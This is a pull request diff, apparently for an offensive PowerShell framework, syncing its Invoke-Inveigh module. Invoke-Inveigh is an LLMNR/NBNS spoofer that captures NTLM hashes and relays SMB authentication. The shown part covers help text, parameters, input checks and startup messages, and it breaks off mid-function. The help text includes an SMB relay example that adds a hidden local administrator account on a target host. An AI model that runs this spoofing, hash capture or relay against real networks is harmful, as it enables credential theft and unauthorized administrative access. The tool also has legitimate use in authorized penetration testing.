### PR TITLE
Sync with Inveigh 1.1.1 and current Tater

### DIFF
--- a/data/module_source/collection/Invoke-Inveigh.ps1
+++ b/data/module_source/collection/Invoke-Inveigh.ps1
@@ -1,4 +1,4 @@
-Function Invoke-Inveigh
+function Invoke-Inveigh
 {
 <#
 .SYNOPSIS
@@ -16,10 +16,12 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following fea
     Run time control
 
 .PARAMETER IP
-Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the SpooferIP parameter is not set.
+Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if
+the SpooferIP parameter is not set.
 
 .PARAMETER SpooferIP
-Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. 
+Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a
+system other than the Inveigh host.
 
 .PARAMETER SpooferHostsReply
 Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
@@ -34,7 +36,8 @@ Default = All: Comma separated list of source IP addresses to respond to when sp
 Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
 
 .PARAMETER SpooferRepeat
-Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
+Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user
+challenge/response has been captured.
 
 .PARAMETER LLMNR
 Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
@@ -49,60 +52,79 @@ Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
 Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
 
 .PARAMETER NBNSTypes
-Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
+Default = 00,20: Comma separated list of NBNS types to spoof.
+Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
 
 .PARAMETER HTTP
 Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
 
 .PARAMETER HTTPS
-Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
-If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
+the local store and attached to port 443. If the script does not exit gracefully, execute 
+"netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal"
+in the cert store.
 
 .PARAMETER HTTPAuth
-Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests.
+Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not
+apply to wpad.dat requests.
 
 .PARAMETER HTTPBasicRealm
 Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
 
 .PARAMETER HTTPDir
-Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener. This parameter will not be used if HTTPResponse is set.
+Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
 
 .PARAMETER HTTPDefaultFile
-Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests.
+Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used
+for wpad.dat requests.
 
 .PARAMETER HTTPDefaultEXE
 Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. 
 
 .PARAMETER HTTPResponse
-Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. Use PowerShell character escapes where necessary.
+Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat
+requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. 
 
 .PARAMETER HTTPSCertAppID
 Specify a valid application GUID for use with the ceriticate.
 
 .PARAMETER HTTPSCertThumbprint
-Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
+Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in
+the current working directory and named Inveigh.pfx.
 
 .PARAMETER WPADAuth
-Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests.
+Setting to Anonymous can prevent browser login prompts.
+
+.PARAMETER WPADEmptyFile
+Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
+Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when
+using WPADIP, WPADPort, or WPADResponse.
 
 .PARAMETER WPADIP
-Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
+Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter
+must be used with WPADPort.
 
 .PARAMETER WPADPort
-Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
+Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter
+must be used with WPADIP.
 
 .PARAMETER WPADDirectHosts
-Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy.
+Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the
+defined proxy.
 
 .PARAMETER WPADResponse
-Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
+Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and
+WPADPort are set. Use PowerShell character escapes where necessary.
 
 .PARAMETER SMB
-Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server.
-Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host.  
+Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still
+direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to
+prevent login requests from being processed by the Inveigh host.  
 
 .PARAMETER Challenge
-Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
+Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a
+random challenge will be generated for each request. This will only be used for non-relay captures.
 
 .PARAMETER MachineAccounts
 Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
@@ -117,41 +139,59 @@ IP address of system to target for SMB relay.
 Command to execute on SMB relay target.
 
 .PARAMETER SMBRelayUsernames
-Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. 
+Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
+domain\username format. 
 
 .PARAMETER SMBRelayAutoDisable
 Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
 
 .PARAMETER SMBRelayNetworkTimeout
-Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
+Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay
+ target after each packet is sent.
 
 .PARAMETER ConsoleOutput
-Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
+Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell.
+
+.PARAMETER ConsoleStatus
+(Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+displaying full capture lists when running through a shell that does not have access to the support functions.
+
+.PARAMETER ConsoleUnique
+Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time console output is enabled.
 
 .PARAMETER FileOutput
 Default = Disabled: (Y/N) Enable/Disable real time file output.
+
+.PARAMETER FileUnique
+Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time file output is enabled.
 
 .PARAMETER StatusOutput
 Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
 
 .PARAMETER OutputStreamOnly
-Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams.
-Note that you will not see the various yellow warning messages if enabled.
+Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh through a shell that does not return other output streams.Note that you will not see the various
+yellow warning messages if enabled.
 
 .PARAMETER OutputDir
-Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
-
-.PARAMETER ShowHelp
-Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must
+also be enabled.
 
 .PARAMETER RunTime
 (Integer) Set the run time duration in minutes.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
 
 .PARAMETER Inspect
 (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.
 
 .PARAMETER Tool
-Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire   
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's
+Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire   
 
 .EXAMPLE
 Import-Module .\Inveigh.psd1;Invoke-Inveigh
@@ -174,20 +214,18 @@ Invoke-Inveigh -Inspect
 Execute with LLMNR, NBNS, SMB, HTTP, and HTTPS disabled in order to only inpect LLMNR/NBNS traffic.
 
 .EXAMPLE
-Invoke-Inveigh -HTTP N -LLMNR N -NBNS N
-Execute with LLMNR/NBNS spoofing disabled and challenge/response capture over SMB only. This may be useful for capturing non-Kerberos authentication attempts on a file server.
-
-.EXAMPLE
 Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N
-Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be useful for sending traffic to a controlled Linux system on another subnet.
+Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be
+useful for sending traffic to a controlled Linux system on another subnet.
 
 .EXAMPLE
-Invoke-Inveigh -HTTPResponse '<html><head><meta http-equiv="refresh" content="0; url=https://duckduckgo.com/"></head></html>'
+Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; url=https://duckduckgo.com/'></head></html>"
 Execute specifying an HTTP redirect response.
 
 .EXAMPLE
 Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add"
-Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target.  
+Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay
+target.  
 
 .NOTES
 1. An elevated administrator or SYSTEM shell is needed.
@@ -206,53 +244,58 @@ https://github.com/Kevin-Robertson/Inveigh
 #>
 
 # Parameter default values can be modified in this section: 
+[CmdletBinding()]
 param
 ( 
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTP="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTPS="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMB="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$LLMNR="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SpooferRepeat="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$FileOutput="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$OutputStreamOnly="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$MachineAccounts="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelay="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y",
-    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0",
-    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][string]$HTTPAuth="NTLM",
-    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][string]$WPADAuth="NTLM",
-    [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes=@("00","20"),
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$IP="",
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP="",
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$WPADIP = "",
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="",
-    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$HTTPDir="",
-    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="",
-    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="",
-    [parameter(Mandatory=$false)][array]$SpooferHostsReply="",
-    [parameter(Mandatory=$false)][array]$SpooferHostsIgnore="",
-    [parameter(Mandatory=$false)][array]$SpooferIPsReply="",
-    [parameter(Mandatory=$false)][array]$SpooferIPsIgnore="",
-    [parameter(Mandatory=$false)][array]$SMBRelayUsernames="",
-    [parameter(Mandatory=$false)][array]$WPADDirectHosts="",
-    [parameter(Mandatory=$false)][int]$LLMNRTTL="30",
-    [parameter(Mandatory=$false)][int]$NBNSTTL="165",
-    [parameter(Mandatory=$false)][int]$WPADPort="",
-    [parameter(Mandatory=$false)][int]$RunTime="",
-    [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="",
-    [parameter(Mandatory=$false)][string]$HTTPBasicRealm="IIS",
-    [parameter(Mandatory=$false)][string]$HTTPDefaultFile="",
-    [parameter(Mandatory=$false)][string]$HTTPDefaultEXE="",
-    [parameter(Mandatory=$false)][string]$HTTPResponse="",
-    [parameter(Mandatory=$false)][string]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF",
-    [parameter(Mandatory=$false)][string]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
-    [parameter(Mandatory=$false)][string]$WPADResponse="",   
-    [parameter(Mandatory=$false)][string]$SMBRelayCommand="", 
-    [parameter(Mandatory=$false)][switch]$Inspect, 
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelay="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile="Y",
+    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth="NTLM",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth="NTLM",
+    [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes=@("00","20"),
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP="",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget ="",
+    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir="",
+    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="",
+    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="",
+    [parameter(Mandatory=$false)][Array]$SpooferHostsReply="",
+    [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore="",
+    [parameter(Mandatory=$false)][Array]$SpooferIPsReply="",
+    [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore="",
+    [parameter(Mandatory=$false)][Array]$SMBRelayUsernames="",
+    [parameter(Mandatory=$false)][Array]$WPADDirectHosts="",
+    [parameter(Mandatory=$false)][Int]$ConsoleStatus="",
+    [parameter(Mandatory=$false)][Int]$LLMNRTTL="30",
+    [parameter(Mandatory=$false)][Int]$NBNSTTL="165",
+    [parameter(Mandatory=$false)][Int]$WPADPort="",
+    [parameter(Mandatory=$false)][Int]$RunTime="",
+    [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout="",
+    [parameter(Mandatory=$false)][String]$HTTPBasicRealm="IIS",
+    [parameter(Mandatory=$false)][String]$HTTPDefaultFile="",
+    [parameter(Mandatory=$false)][String]$HTTPDefaultEXE="",
+    [parameter(Mandatory=$false)][String]$HTTPResponse="",
+    [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF",
+    [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
+    [parameter(Mandatory=$false)][String]$WPADResponse="",
+    [parameter(Mandatory=$false)][String]$SMBRelayCommand="",
+    [parameter(Mandatory=$false)][Switch]$Inspect,
     [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
 )
 
@@ -271,47 +314,53 @@ if(!$SpooferIP)
     $SpooferIP = $IP  
 }
 
-if($SMBRelay -eq 'y')
+if($SMBRelay -eq 'Y')
 {
+
     if(!$SMBRelayTarget)
     {
-        Throw "You must specify an -SMBRelayTarget if enabling -SMBRelay"
+        throw "You must specify an -SMBRelayTarget if enabling -SMBRelay"
     }
 
     if(!$SMBRelayCommand)
     {
-        Throw "You must specify an -SMBRelayCommand if enabling -SMBRelay"
+        throw "You must specify an -SMBRelayCommand if enabling -SMBRelay"
     }
 
     if($Challenge -or $HTTPDefaultFile -or $HTTPDefaultEXE -or $HTTPResponse -or $WPADIP -or $WPADPort -or $WPADResponse)
     {
-        Throw "-Challenge -HTTPDefaultFile, -HTTPDefaultEXE, -HTTPResponse, -WPADIP, -WPADPort, and -WPADResponse can not be used when enabling -SMBRelay"
+        throw "-Challenge -HTTPDefaultFile, -HTTPDefaultEXE, -HTTPResponse, -WPADIP, -WPADPort, and -WPADResponse can not be used when enabling -SMBRelay"
     }
     elseif($HTTPAuth -ne 'NTLM' -or $WPADAuth -eq 'Basic')
     {
-        Throw "Only -HTTPAuth NTLM, -WPADAuth NTLM, and -WPADAuth Anonymous can be used when enabling -SMBRelay"
+        throw "Only -HTTPAuth NTLM, -WPADAuth NTLM, and -WPADAuth Anonymous can be used when enabling -SMBRelay"
     }
+
 }
 
 if($HTTPDefaultFile -or $HTTPDefaultEXE)
 {
+
     if(!$HTTPDir)
     {
-        Throw "You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
+        throw "You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
     }
+
 }
 
 if($WPADIP -or $WPADPort)
 {
+
     if(!$WPADIP)
     {
-        Throw "You must specify a -WPADPort to go with -WPADIP"
+        throw "You must specify a -WPADPort to go with -WPADIP"
     }
 
     if(!$WPADPort)
     {
-        Throw "You must specify a -WPADIP to go with -WPADPort"
+        throw "You must specify a -WPADIP to go with -WPADPort"
     }
+
 }
 
 if(!$OutputDir)
@@ -325,22 +374,24 @@ else
 
 if(!$inveigh)
 {
-    $global:inveigh = [hashtable]::Synchronized(@{})
+    $global:inveigh = [HashTable]::Synchronized(@{})
     $inveigh.log = New-Object System.Collections.ArrayList
     $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
     $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
     $inveigh.cleartext_list = New-Object System.Collections.ArrayList
-    $inveigh.IP_capture_list = @()
-    $inveigh.SMBRelay_failed_list = @()
+    $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+    $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
 }
 
 if($inveigh.running)
 {
-    Throw "Invoke-Inveigh is already running, use Stop-Inveigh"
+    throw "Invoke-Inveigh is already running, use Stop-Inveigh"
 }
 elseif($inveigh.relay_running)
 {
-    Throw "Invoke-InveighRelay is already running, use Stop-Inveigh"
+    throw "Invoke-InveighRelay is already running, use Stop-Inveigh"
 }
 
 $inveigh.sniffer_socket = $null
@@ -375,7 +426,7 @@ $inveigh.WPAD_response = $WPADResponse
 $inveigh.challenge = $Challenge
 $inveigh.running = $true
 
-if($StatusOutput -eq 'y')
+if($StatusOutput -eq 'Y')
 {
     $inveigh.status_output = $true
 }
@@ -384,7 +435,7 @@ else
     $inveigh.status_output = $false
 }
 
-if($OutputStreamOnly -eq 'y')
+if($OutputStreamOnly -eq 'Y')
 {
     $inveigh.output_stream_only = $true
 }
@@ -425,98 +476,98 @@ else
 }
 
 # Write startup messages
-$inveigh.status_queue.add("Inveigh started at $(Get-Date -format 's')")|Out-Null
-$inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh started")]) |Out-Null
-$inveigh.status_queue.add("Listening IP Address = $IP") |Out-Null
-$inveigh.status_queue.add("LLMNR/NBNS Spoofer IP Address = $SpooferIP")|Out-Null
+$inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')")  > $null
+$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null
+$inveigh.status_queue.Add("Listening IP Address = $IP")  > $null
+$inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP")  > $null
 
-if($LLMNR -eq 'y')
+if($LLMNR -eq 'Y')
 {
-    $inveigh.status_queue.add("LLMNR Spoofing Enabled")|Out-Null
-    $inveigh.status_queue.add("LLMNR TTL = $LLMNRTTL Seconds")|Out-Null
+    $inveigh.status_queue.Add("LLMNR Spoofing Enabled")  > $null
+    $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds")  > $null
     $LLMNR_response_message = "- spoofed response has been sent"
 }
 else
 {
-    $inveigh.status_queue.add("LLMNR Spoofing Disabled")|Out-Null
+    $inveigh.status_queue.Add("LLMNR Spoofing Disabled")  > $null
     $LLMNR_response_message = "- LLMNR spoofing is disabled"
 }
 
-if($NBNS -eq 'y')
+if($NBNS -eq 'Y')
 {
     $NBNSTypes_output = $NBNSTypes -join ","
     
     if($NBNSTypes.Count -eq 1)
     {
-        $inveigh.status_queue.add("NBNS Spoofing Of Type $NBNSTypes_output Enabled")|Out-Null
+        $inveigh.status_queue.Add("NBNS Spoofing Of Type $NBNSTypes_output Enabled")  > $null
     }
     else
     {
-        $inveigh.status_queue.add("NBNS Spoofing Of Types $NBNSTypes_output Enabled")|Out-Null
+        $inveigh.status_queue.Add("NBNS Spoofing Of Types $NBNSTypes_output Enabled")  > $null
     }
 
-    $inveigh.status_queue.add("NBNS TTL = $NBNSTTL Seconds")|Out-Null
+    $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds")  > $null
     $NBNS_response_message = "- spoofed response has been sent"
 }
 else
 {
-    $inveigh.status_queue.add("NBNS Spoofing Disabled")|Out-Null
+    $inveigh.status_queue.Add("NBNS Spoofing Disabled")  > $null
     $NBNS_response_message = "- NBNS spoofing is disabled"
 }
 
-if($SpooferHostsReply -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
+if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
 {
-    $inveigh.status_queue.add("Spoofing requests for " + $SpooferHostsReply -join ",")|Out-Null
+    $inveigh.status_queue.Add("Spoofing requests for " + $SpooferHostsReply -join ",")  > $null
 }
 
-if($SpooferHostsIgnore -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
+if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
 {
-    $inveigh.status_queue.add("Ignoring requests for " + $SpooferHostsIgnore -join ",")|Out-Null
+    $inveigh.status_queue.Add("Ignoring requests for " + $SpooferHostsIgnore -join ",")  > $null
 }
 
-if($SpooferIPsReply -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
+if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
 {
-    $inveigh.status_queue.add("Spoofing requests from " + $SpooferIPsReply -join ",")|Out-Null
+    $inveigh.status_queue.Add("Spoofing requests from " + $SpooferIPsReply -join ",")  > $null
 }
 
-if($SpooferIPsIgnore -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
+if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
 {
-    $inveigh.status_queue.add("Ignoring requests from " + $SpooferIPsIgnore -join ",")|Out-Null
+    $inveigh.status_queue.Add("Ignoring requests from " + $SpooferIPsIgnore -join ",")  > $null
 }
 
-if($SpooferRepeat -eq 'n')
+if($SpooferRepeat -eq 'N')
 {
     $inveigh.spoofer_repeat = $false
-    $inveigh.status_queue.add("Spoofer Repeating Disabled")|Out-Null
+    $inveigh.status_queue.Add("Spoofer Repeating Disabled")  > $null
 }
 else
 {
     $inveigh.spoofer_repeat = $true
-    $inveigh.IP_capture_list = @()
 }
 
-if($SMB -eq 'y')
+if($SMB -eq 'Y')
 {
-    $inveigh.status_queue.add("SMB Capture Enabled")|Out-Null
+    $inveigh.status_queue.Add("SMB Capture Enabled")  > $null
 }
 else
 {
-    $inveigh.status_queue.add("SMB Capture Disabled")|Out-Null
+    $inveigh.status_queue.Add("SMB Capture Disabled")  > $null
 }
 
-if($HTTP -eq 'y')
+if($HTTP -eq 'Y')
 {
     $inveigh.HTTP = $true
-    $inveigh.status_queue.add("HTTP Capture Enabled")|Out-Null
+    $inveigh.status_queue.Add("HTTP Capture Enabled")  > $null
 }
 else
 {
     $inveigh.HTTP = $false
-    $inveigh.status_queue.add("HTTP Capture Disabled")|Out-Null
+    $inveigh.status_queue.Add("HTTP Capture Disabled")  > $null
 }
 
-if($HTTPS -eq 'y')
+if($HTTPS -eq 'Y')
 {
+
     try
     {
         $inveigh.HTTPS = $true
@@ -530,54 +581,57 @@ if($HTTPS -eq 'y')
         $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}"
         $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID)
         & "netsh" $netsh_arguments > $null
-        $inveigh.status_queue.add("HTTPS Capture Enabled")|Out-Null
+        $inveigh.status_queue.Add("HTTPS Capture Enabled")  > $null
     }
     catch
     {
         $certificate_store.Close()
         $HTTPS="N"
         $inveigh.HTTPS = $false
-        $inveigh.status_queue.add("HTTPS Capture Disabled Due To Certificate Install Error")|Out-Null
+        $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error")  > $null
     }
+
 }
 else
 {
-    $inveigh.status_queue.add("HTTPS Capture Disabled")|Out-Null
+    $inveigh.status_queue.Add("HTTPS Capture Disabled")  > $null
 }
 
 if($inveigh.HTTP -or $inveigh.HTTPS)
 {
-    $inveigh.status_queue.add("HTTP/HTTPS Authentication = $HTTPAuth")|Out-Null
-    $inveigh.status_queue.add("WPAD Authentication = $WPADAuth")|Out-Null
+    $inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth")  > $null
+    $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth")  > $null
 
     if($HTTPDir -and !$HTTPResponse)
     {
